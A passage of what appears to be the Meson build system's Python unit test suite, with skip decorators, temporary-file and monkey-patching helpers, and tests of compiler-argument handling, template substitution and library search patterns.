'user.name', 'Author Person'], cwd=project_dir)
subprocess.check_call(['git', 'config',
'user.email', 'teh_coderz@example.com'], cwd=project_dir)
subprocess.check_call('git add *', cwd=project_dir, shell=True,
stdout=subprocess.DEVNULL)
subprocess.check_call(['git', 'commit', '-a', '-m', 'I am a project'], cwd=project_dir,
stdout=subprocess.DEVNULL)
@functools.lru_cache()
def is_real_gnu_compiler(path):
'''
Check if the gcc we have is a real gcc and not a macOS wrapper around clang
'''
if not path:
return False
out = subprocess.check_output([path, '--version'], universal_newlines=True, stderr=subprocess.STDOUT)
return 'Free Software Foundation' in out
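# Illustration (assumption, not original code): on macOS the `gcc` binary is often a
# Clang shim, so is_real_gnu_compiler(shutil.which('gcc')) returns False there while
# a genuine GNU toolchain on Linux returns True.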
def skipIfNoExecutable(exename):
'''
Skip this test if the given executable is not found.
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
if shutil.which(exename) is None:
raise unittest.SkipTest(exename + ' not found')
return func(*args, **kwargs)
return wrapped
return wrapper
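# Hedged sketch (not part of the original suite): the skip decorators defined here wrap
# a callable so it raises unittest.SkipTest before running when a tool is missing. The
# function below is hypothetical and only demonstrates the call pattern.
@skipIfNoExecutable('readelf')
def _example_decorated_check():
    return shutil.which('readelf')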
def skipIfNoPkgconfig(f):
'''
Skip this test if no pkg-config is found, unless we're on CI.
This allows users to run our test suite without having
pkg-config installed on, f.ex., macOS, while ensuring that our CI does not
silently skip the test because of misconfiguration.
Note: Yes, we provide pkg-config even while running Windows CI
'''
@functools.wraps(f)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('pkg-config') is None:
raise unittest.SkipTest('pkg-config not found')
return f(*args, **kwargs)
return wrapped
def skipIfNoPkgconfigDep(depname):
'''
Skip this test if the given pkg-config dep is not found, unless we're on CI.
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('pkg-config') is None:
raise unittest.SkipTest('pkg-config not found')
if not is_ci() and subprocess.call(['pkg-config', '--exists', depname]) != 0:
raise unittest.SkipTest('pkg-config dependency {} not found.'.format(depname))
return func(*args, **kwargs)
return wrapped
return wrapper
def skip_if_no_cmake(f):
'''
Skip this test if no cmake is found, unless we're on CI.
This allows users to run our test suite without having
cmake installed on, f.ex., macOS, while ensuring that our CI does not
silently skip the test because of misconfiguration.
'''
@functools.wraps(f)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('cmake') is None:
raise unittest.SkipTest('cmake not found')
return f(*args, **kwargs)
return wrapped
def skip_if_not_language(lang):
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
try:
env = get_fake_env()
f = getattr(env, 'detect_{}_compiler'.format(lang))
f(MachineChoice.HOST)
except EnvironmentException:
raise unittest.SkipTest('No {} compiler found.'.format(lang))
return func(*args, **kwargs)
return wrapped
return wrapper
def skip_if_env_set(key):
'''
Skip a test if a particular env is set, except when running under CI
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
old = None
if key in os.environ:
if not is_ci():
raise unittest.SkipTest('Env var {!r} set, skipping'.format(key))
old = os.environ.pop(key)
try:
return func(*args, **kwargs)
finally:
if old is not None:
os.environ[key] = old
return wrapped
return wrapper
def skip_if_not_base_option(feature):
"""Skip tests if The compiler does not support a given base option.
for example, ICC doesn't currently support b_sanitize.
"""
def actual(f):
@functools.wraps(f)
def wrapped(*args, **kwargs):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if feature not in cc.base_options:
raise unittest.SkipTest(
'{} not available with {}'.format(feature, cc.id))
return f(*args, **kwargs)
return wrapped
return actual
@contextmanager
def temp_filename():
'''A context manager which provides a filename to an empty temporary file.
On exit the file will be deleted.
'''
fd, filename = tempfile.mkstemp()
os.close(fd)
try:
yield filename
finally:
try:
os.remove(filename)
except OSError:
pass
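# Hedged usage sketch (not original code): temp_filename() yields the path of an empty
# file and removes it on exit, so tests can write scratch data without manual cleanup.
def _example_temp_filename_usage():
    with temp_filename() as fname:
        with open(fname, 'w') as f:
            f.write('scratch')
        return os.path.getsize(fname)  # 7 while still inside the context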
@contextmanager
def no_pkgconfig():
'''
A context manager that overrides shutil.which and ExternalProgram to force
them to return None for pkg-config to simulate it not existing.
'''
old_which = shutil.which
old_search = ExternalProgram._search
def new_search(self, name, search_dir):
if name == 'pkg-config':
return [None]
return old_search(self, name, search_dir)
def new_which(cmd, *kwargs):
if cmd == 'pkg-config':
return None
return old_which(cmd, *kwargs)
shutil.which = new_which
ExternalProgram._search = new_search
try:
yield
finally:
shutil.which = old_which
ExternalProgram._search = old_search
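# Hedged usage sketch (not original code): inside no_pkgconfig() the patched lookups
# behave as if pkg-config were absent; the originals are restored on exit.
def _example_no_pkgconfig_usage():
    with no_pkgconfig():
        assert shutil.which('pkg-config') is None
    return shutil.which('pkg-config')  # real lookup again after the context exits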
class PatchModule:
'''
Fancy monkey-patching! Whee! Can't use mock.patch because it only
patches in the local namespace.
'''
def __init__(self, func, name, impl):
self.func = func
assert(isinstance(name, str))
self.func_name = name
self.old_impl = None
self.new_impl = impl
def __enter__(self):
self.old_impl = self.func
exec('{} = self.new_impl'.format(self.func_name))
def __exit__(self, *args):
exec('{} = self.old_impl'.format(self.func_name))
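# Illustration (assumption, not original code): PatchModule is meant to be used as a
# context manager, e.g.
#   with PatchModule(some_module.func, 'some_module.func', fake_impl):
#       ...  # code under test sees fake_impl
# and the original attribute is restored when the block exits.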
class InternalTests(unittest.TestCase):
def test_version_number(self):
searchfunc = mesonbuild.environment.search_version
self.assertEqual(searchfunc('foobar 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('1.2.3'), '1.2.3')
self.assertEqual(searchfunc('foobar 2016.10.28 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('2016.10.28 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('foobar 2016.10.128'), 'unknown version')
self.assertEqual(searchfunc('2016.10.128'), 'unknown version')
def test_mode_symbolic_to_bits(self):
modefunc = mesonbuild.mesonlib.FileMode.perms_s_to_bits
self.assertEqual(modefunc('---------'), 0)
self.assertEqual(modefunc('r--------'), stat.S_IRUSR)
self.assertEqual(modefunc('---r-----'), stat.S_IRGRP)
self.assertEqual(modefunc('------r--'), stat.S_IROTH)
self.assertEqual(modefunc('-w-------'), stat.S_IWUSR)
self.assertEqual(modefunc('----w----'), stat.S_IWGRP)
self.assertEqual(modefunc('-------w-'), stat.S_IWOTH)
self.assertEqual(modefunc('--x------'), stat.S_IXUSR)
self.assertEqual(modefunc('-----x---'), stat.S_IXGRP)
self.assertEqual(modefunc('--------x'), stat.S_IXOTH)
self.assertEqual(modefunc('--S------'), stat.S_ISUID)
self.assertEqual(modefunc('-----S---'), stat.S_ISGID)
self.assertEqual(modefunc('--------T'), stat.S_ISVTX)
self.assertEqual(modefunc('--s------'), stat.S_ISUID | stat.S_IXUSR)
self.assertEqual(modefunc('-----s---'), stat.S_ISGID | stat.S_IXGRP)
self.assertEqual(modefunc('--------t'), stat.S_ISVTX | stat.S_IXOTH)
self.assertEqual(modefunc('rwx------'), stat.S_IRWXU)
self.assertEqual(modefunc('---rwx---'), stat.S_IRWXG)
self.assertEqual(modefunc('------rwx'), stat.S_IRWXO)
# We could keep listing combinations exhaustively but that seems
# tedious and pointless. Just test a few more.
self.assertEqual(modefunc('rwxr-xr-x'),
stat.S_IRWXU |
stat.S_IRGRP | stat.S_IXGRP |
stat.S_IROTH | stat.S_IXOTH)
self.assertEqual(modefunc('rw-r--r--'),
stat.S_IRUSR | stat.S_IWUSR |
stat.S_IRGRP |
stat.S_IROTH)
self.assertEqual(modefunc('rwsr-x---'),
stat.S_IRWXU | stat.S_ISUID |
stat.S_IRGRP | stat.S_IXGRP)
def test_compiler_args_class(self):
cargsfunc = mesonbuild.compilers.CompilerArgs
cc = mesonbuild.compilers.CCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock())
# Test that bad initialization fails
self.assertRaises(TypeError, cargsfunc, [])
self.assertRaises(TypeError, cargsfunc, [], [])
self.assertRaises(TypeError, cargsfunc, cc, [], [])
# Test that empty initialization works
a = cargsfunc(cc)
self.assertEqual(a, [])
# Test that list initialization works
a = cargsfunc(['-I.', '-I..'], cc)
self.assertEqual(a, ['-I.', '-I..'])
# Test that there is no de-dup on initialization
self.assertEqual(cargsfunc(['-I.', '-I.'], cc), ['-I.', '-I.'])
## Test that appending works
a.append('-I..')
self.assertEqual(a, ['-I..', '-I.'])
a.append('-O3')
self.assertEqual(a, ['-I..', '-I.', '-O3'])
## Test that in-place addition works
a += ['-O2', '-O2']
self.assertEqual(a, ['-I..', '-I.', '-O3', '-O2', '-O2'])
# Test that removal works
a.remove('-O2')
self.assertEqual(a, ['-I..', '-I.', '-O3', '-O2'])
# Test that de-dup happens on addition
a += ['-Ifoo', '-Ifoo']
self.assertEqual(a, ['-Ifoo', '-I..', '-I.', '-O3', '-O2'])
# .extend() is just +=, so we don't test it
## Test that addition works
# Test that adding a list with just one old arg works and yields the same array
a = a + ['-Ifoo']
self.assertEqual(a, ['-Ifoo', '-I..', '-I.', '-O3', '-O2'])
# Test that adding a list with one arg new and one old works
a = a + ['-Ifoo', '-Ibaz']
self.assertEqual(a, ['-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2'])
# Test that adding args that must be prepended and appended works
a = a + ['-Ibar', '-Wall']
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2', '-Wall'])
## Test that reflected addition works
# Test that adding to a list with just one old arg works and yields the same array
a = ['-Ifoo'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2', '-Wall'])
# Test that adding to a list with just one new arg that is not pre-pended works
a = ['-Werror'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Werror', '-O3', '-O2', '-Wall'])
# Test that adding to a list with two new args preserves the order
a = ['-Ldir', '-Lbah'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Ldir', '-Lbah', '-Werror', '-O3', '-O2', '-Wall'])
# Test that adding to a list with old args does nothing
a = ['-Ibar', '-Ibaz', '-Ifoo'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Ldir', '-Lbah', '-Werror', '-O3', '-O2', '-Wall'])
## Test that adding libraries works
l = cargsfunc(cc, ['-Lfoodir', '-lfoo'])
self.assertEqual(l, ['-Lfoodir', '-lfoo'])
# Adding a library and a libpath appends both correctly
l += ['-Lbardir', '-lbar']
self.assertEqual(l, ['-Lbardir', '-Lfoodir', '-lfoo', '-lbar'])
# Adding the same library again does nothing
l += ['-lbar']
self.assertEqual(l, ['-Lbardir', '-Lfoodir', '-lfoo', '-lbar'])
## Test that 'direct' append and extend works
l = cargsfunc(cc, ['-Lfoodir', '-lfoo'])
self.assertEqual(l, ['-Lfoodir', '-lfoo'])
# Direct-adding a library and a libpath appends both correctly
l.extend_direct(['-Lbardir', '-lbar'])
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar'])
# Direct-adding the same library again still adds it
l.append_direct('-lbar')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar'])
# Direct-adding with absolute path deduplicates
l.append_direct('/libbaz.a')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a'])
# Adding libbaz again does nothing
l.append_direct('/libbaz.a')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a'])
def test_compiler_args_class_gnuld(self):
cargsfunc = mesonbuild.compilers.CompilerArgs
## Test --start/end-group
linker = mesonbuild.linkers.GnuDynamicLinker([], MachineChoice.HOST, 'fake', '-Wl,')
gcc = mesonbuild.compilers.GnuCCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock(), linker=linker)
## Ensure that the fake compiler is never called by overriding the relevant function
gcc.get_default_include_dirs = lambda: ['/usr/include', '/usr/share/include', '/usr/local/include']
## Test that 'direct' append and extend works
l = cargsfunc(gcc, ['-Lfoodir', '-lfoo'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group'])
# Direct-adding a library and a libpath appends both correctly
l.extend_direct(['-Lbardir', '-lbar'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-Wl,--end-group'])
# Direct-adding the same library again still adds it
l.append_direct('-lbar')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '-Wl,--end-group'])
# Direct-adding with absolute path deduplicates
l.append_direct('/libbaz.a')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group'])
# Adding libbaz again does nothing
l.append_direct('/libbaz.a')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group'])
# Adding a non-library argument doesn't include it in the group
l += ['-Lfoo', '-Wl,--export-dynamic']
self.assertEqual(l.to_native(copy=True), ['-Lfoo', '-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group', '-Wl,--export-dynamic'])
# -Wl,-ldl is detected as a library and gets added to the group
l.append('-Wl,-ldl')
self.assertEqual(l.to_native(copy=True), ['-Lfoo', '-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--export-dynamic', '-Wl,-ldl', '-Wl,--end-group'])
def test_compiler_args_remove_system(self):
cargsfunc = mesonbuild.compilers.CompilerArgs
## Test --start/end-group
linker = mesonbuild.linkers.GnuDynamicLinker([], MachineChoice.HOST, 'fake', '-Wl,')
gcc = mesonbuild.compilers.GnuCCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock(), linker=linker)
## Ensure that the fake compiler is never called by overriding the relevant function
gcc.get_default_include_dirs = lambda: ['/usr/include', '/usr/share/include', '/usr/local/include']
## Test that 'direct' append and extend works
l = cargsfunc(gcc, ['-Lfoodir', '-lfoo'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group'])
## Test that to_native removes all system includes
l += ['-isystem/usr/include', '-isystem=/usr/share/include', '-DSOMETHING_IMPORTANT=1', '-isystem', '/usr/local/include']
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group', '-DSOMETHING_IMPORTANT=1'])
def test_string_templates_substitution(self):
dictfunc = mesonbuild.mesonlib.get_filenames_templates_dict
substfunc = mesonbuild.mesonlib.substitute_values
ME = mesonbuild.mesonlib.MesonException
# Identity
self.assertEqual(dictfunc([], []), {})
# One input, no outputs
inputs = ['bar/foo.c.in']
outputs = []
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + cmd[1:])
cmd = ['@INPUT0@.out', '@PLAINNAME@.ok', 'strings']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out'] + [d['@PLAINNAME@'] + '.ok'] + cmd[2:])
cmd = ['@INPUT@', '@BASENAME@.hah', 'strings']
self.assertEqual(substfunc(cmd, d),
inputs + [d['@BASENAME@'] + '.hah'] + cmd[2:])
cmd = ['@OUTPUT@']
self.assertRaises(ME, substfunc, cmd, d)
# One input, one output
inputs = ['bar/foo.c.in']
outputs = ['out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c',
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': '.'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@INPUT@.out', '@OUTPUT@', 'strings']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out'] + outputs + cmd[2:])
cmd = ['@INPUT0@.out', '@PLAINNAME@.ok', '@OUTPUT0@']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out', d['@PLAINNAME@'] + '.ok'] + outputs)
cmd = ['@INPUT@', '@BASENAME@.hah', 'strings']
self.assertEqual(substfunc(cmd, d),
inputs + [d['@BASENAME@'] + '.hah'] + cmd[2:])
# One input, one output with a subdir
outputs = ['dir/out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c',
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Two inputs, no outputs
inputs = ['bar/foo.c.in', 'baz/foo.c.in']
outputs = []
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1]}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@INPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), inputs + cmd[1:])
cmd = ['@INPUT0@.out', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + cmd[1:])
cmd = ['@INPUT0@.out', '@INPUT1@.ok', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out', inputs[1] + '.ok'] + cmd[2:])
cmd = ['@INPUT0@', '@INPUT1@', 'strings']
self.assertEqual(substfunc(cmd, d), inputs + cmd[2:])
# Many inputs, can't use @INPUT@ like this
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@INPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Too many inputs
cmd = ['@PLAINNAME@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@BASENAME@']
self.assertRaises(ME, substfunc, cmd, d)
# No outputs
cmd = ['@OUTPUT@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@OUTPUT0@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@OUTDIR@']
self.assertRaises(ME, substfunc, cmd, d)
# Two inputs, one output
outputs = ['dir/out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1],
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@OUTPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[1:])
cmd = ['@OUTPUT@.out', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out'] + cmd[1:])
cmd = ['@OUTPUT0@.out', '@INPUT1@.ok', 'strings']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out', inputs[1] + '.ok'] + cmd[2:])
# Many inputs, can't use @INPUT@ like this
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@INPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough outputs
cmd = ['@OUTPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Two inputs, two outputs
outputs = ['dir/out.c', 'dir/out2.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1],
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTPUT1@': outputs[1],
'@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@OUTPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[1:])
cmd = ['@OUTPUT0@', '@OUTPUT1@', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[2:])
cmd = ['@OUTPUT0@.out', '@INPUT1@.ok', '@OUTDIR@']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out', inputs[1] + '.ok', 'dir'])
# Many inputs, can't use @INPUT@ like this
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@INPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough outputs
cmd = ['@OUTPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Many outputs, can't use @OUTPUT@ like this
cmd = ['@OUTPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
def test_needs_exe_wrapper_override(self):
config = ConfigParser()
config['binaries'] = {
'c': '\'/usr/bin/gcc\'',
}
config['host_machine'] = {
'system': '\'linux\'',
'cpu_family': '\'arm\'',
'cpu': '\'armv7\'',
'endian': '\'little\'',
}
# Cannot be used as a context manager because we need to
# open it a second time, which is not possible on
# Windows.
configfile = tempfile.NamedTemporaryFile(mode='w+', delete=False)
configfilename = configfile.name
config.write(configfile)
configfile.flush()
configfile.close()
opts = get_fake_options()
opts.cross_file = (configfilename,)
env = get_fake_env(opts=opts)
detected_value = env.need_exe_wrapper()
os.unlink(configfilename)
desired_value = not detected_value
config['properties'] = {
'needs_exe_wrapper': 'true' if desired_value else 'false'
}
configfile = tempfile.NamedTemporaryFile(mode='w+', delete=False)
configfilename = configfile.name
config.write(configfile)
configfile.close()
opts = get_fake_options()
opts.cross_file = (configfilename,)
env = get_fake_env(opts=opts)
forced_value = env.need_exe_wrapper()
os.unlink(configfilename)
self.assertEqual(forced_value, desired_value)
def test_listify(self):
listify = mesonbuild.mesonlib.listify
# Test sanity
self.assertEqual([1], listify(1))
self.assertEqual([], listify([]))
self.assertEqual([1], listify([1]))
# Test flattening
self.assertEqual([1, 2, 3], listify([1, [2, 3]]))
self.assertEqual([1, 2, 3], listify([1, [2, [3]]]))
self.assertEqual([1, [2, [3]]], listify([1, [2, [3]]], flatten=False))
# Test flattening and unholdering
holder1 = ObjectHolder(1)
holder3 = ObjectHolder(3)
self.assertEqual([holder1], listify(holder1))
self.assertEqual([holder1], listify([holder1]))
self.assertEqual([holder1, 2], listify([holder1, 2]))
self.assertEqual([holder1, 2, 3], listify([holder1, 2, [3]]))
self.assertEqual([1], listify(holder1, unholder=True))
self.assertEqual([1], listify([holder1], unholder=True))
self.assertEqual([1, 2], listify([holder1, 2], unholder=True))
self.assertEqual([1, 2, 3], listify([holder1, 2, [holder3]], unholder=True))
# Unholding doesn't work recursively when not flattening
self.assertEqual([1, [2], [holder3]], listify([holder1, [2], [holder3]], unholder=True, flatten=False))
def test_extract_as_list(self):
extract = mesonbuild.mesonlib.extract_as_list
# Test sanity
kwargs = {'sources': [1, 2, 3]}
self.assertEqual([1, 2, 3], extract(kwargs, 'sources'))
self.assertEqual(kwargs, {'sources': [1, 2, 3]})
self.assertEqual([1, 2, 3], extract(kwargs, 'sources', pop=True))
self.assertEqual(kwargs, {})
# Test unholding
holder3 = ObjectHolder(3)
kwargs = {'sources': [1, 2, holder3]}
self.assertEqual([1, 2, 3], extract(kwargs, 'sources', unholder=True))
self.assertEqual(kwargs, {'sources': [1, 2, holder3]})
self.assertEqual([1, 2, 3], extract(kwargs, 'sources', unholder=True, pop=True))
self.assertEqual(kwargs, {})
# Test listification
kwargs = {'sources': [1, 2, 3], 'pch_sources': [4, 5, 6]}
self.assertEqual([[1, 2, 3], [4, 5, 6]], extract(kwargs, 'sources', 'pch_sources'))
def test_pkgconfig_module(self):
class Mock:
pass
mock = Mock()
mock.pcdep = Mock()
mock.pcdep.name = "some_name"
mock.version_reqs = []
# pkgconfig dependency as lib
deps = mesonbuild.modules.pkgconfig.DependenciesHelper("thislib")
deps.add_pub_libs([mock])
self.assertEqual(deps.format_reqs(deps.pub_reqs), "some_name")
# pkgconfig dependency as requires
deps = mesonbuild.modules.pkgconfig.DependenciesHelper("thislib")
deps.add_pub_reqs([mock])
self.assertEqual(deps.format_reqs(deps.pub_reqs), "some_name")
def _test_all_naming(self, cc, env, patterns, platform):
shr = patterns[platform]['shared']
stc = patterns[platform]['static']
shrstc = shr + tuple([x for x in stc if x not in shr])
stcshr = stc + tuple([x for x in shr if x not in stc])
p = cc.get_library_naming(env, LibType.SHARED)
self.assertEqual(p, shr)
p = cc.get_library_naming(env, LibType.STATIC)
self.assertEqual(p, stc)
p = cc.get_library_naming(env, LibType.PREFER_STATIC)
self.assertEqual(p, stcshr)
p = cc.get_library_naming(env, LibType.PREFER_SHARED)
self.assertEqual(p, shrstc)
# Test find library by mocking up openbsd
if platform != 'openbsd':
return
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'libfoo.so.6.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.5.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.54.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.66a.0b'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.70.0.so.1'), 'w') as f:
f.write('')
found = cc.find_library_real('foo', env, [tmpdir], '', LibType.PREFER_SHARED)
self.assertEqual(os.path.basename(found[0]), 'libfoo.so.54.0')
def test_find_library_patterns(self):
'''
Unit test for the library search patterns used by find_library()
'''
unix_static = ('lib{}.a', '{}.a')
msvc_static = ('lib{}.a', 'lib{}.lib', '{}.a', '{}.lib')
# This is the priority list of pattern matching for library searching
patterns = {'openbsd': {'shared': ('lib{}.so', '{}.so', 'lib{}.so.[0-9]*.[0-9]*', '{}.so.[0-9]*.[0-9]*'),
'static': unix_static},
'linux': {'shared': ('lib{}.so', '{}.so'),
'static': unix_static},
'darwin': {'shared': ('lib{}.dylib', 'lib{}.so', '{}.dylib', '{}.so'),
'static': unix_static},
'cygwin': {'shared': ('cyg{}.dll', 'cyg{}.dll.a', 'lib{}.dll',
'lib{}.dll.a', '{}.dll', '{}.dll.a'),
'static': ('cyg{}.a',) + unix_static},
'windows-msvc': {'shared': ('lib{}.lib', '{}.lib'),
'static': msvc_static},
'windows-mingw': {'shared': ('lib{}.dll.a', 'lib{}.lib', 'lib{}.dll',
'{}.dll.a', '{}.lib', '{}.dll'),
'static': msvc_static}}
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if is_osx():
self._test_all_naming(cc, env, patterns, 'darwin')
elif is_cygwin():
self._test_all_naming(cc, env, patterns, 'cygwin')
elif is_windows():
if cc.get_argument_syntax() == 'msvc':
self._test_all_naming(cc, env, patterns, 'windows-msvc')
else:
self._test_all_naming(cc, env, patterns, 'windows-mingw')
elif is_openbsd():
self._test_all_naming(cc, env, patterns, 'openbsd')
else:
self._test_all_naming(cc, env, patterns, 'linux')
env.machines.host.system = 'openbsd'
self._test_all_naming(cc, env, patterns, 'openbsd')
env.machines.host.system = 'darwin'
self._test_all_naming(cc, env, patterns, 'darwin')
env.machines.host.system = 'cygwin'
self._test_all_naming(cc, env, patterns, 'cygwin')
env.machines.host.system = 'windows'
self._test_all_naming(cc, env, patterns, 'windows-mingw')
def test_pkgconfig_parse_libs(self):
'''
Unit test for parsing of pkg-config output to search for libraries
https://github.com/mesonbuild/meson/issues/3951
'''
def create_static_lib(name):
if not is_osx():
name.open('w').close()
return
src = name.with_suffix('.c')
out = name.with_suffix('.o')
with src.open('w') as f:
f.write('int meson_foobar (void) { return 0; }')
subprocess.check_call(['clang', '-c', str(src), '-o', str(out)])
subprocess.check_call(['ar', 'csr', str(name), str(out)])
with tempfile.TemporaryDirectory() as tmpdir:
pkgbin = ExternalProgram('pkg-config', command=['pkg-config'], silent=True)
env = get_fake_env()
compiler = env.detect_c_compiler(MachineChoice.HOST)
env.coredata.compilers.host = {'c': compiler}
env.coredata.compiler_options.host['c_link_args'] = FakeCompilerOptions()
p1 = Path(tmpdir) / '1'
p2 = Path(tmpdir) / '2'
p1.mkdir()
p2.mkdir()
# libfoo.a is in one prefix
create_static_lib(p1 / 'libfoo.a')
# libbar.a is in both prefixes
create_static_lib(p1 / 'libbar.a')
create_static_lib(p2 / 'libbar.a')
# Ensure that we never statically link to these
create_static_lib(p1 / 'libpthread.a')
create_static_lib(p1 / 'libm.a')
create_static_lib(p1 / 'libc.a')
create_static_lib(p1 / 'libdl.a')
create_static_lib(p1 / 'librt.a')
def fake_call_pkgbin(self, args, env=None):
if '--libs' not in args:
return 0, ''
if args[0] == 'foo':
return 0, '-L{} -lfoo -L{} -lbar'.format(p2.as_posix(), p1.as_posix())
if args[0] == 'bar':
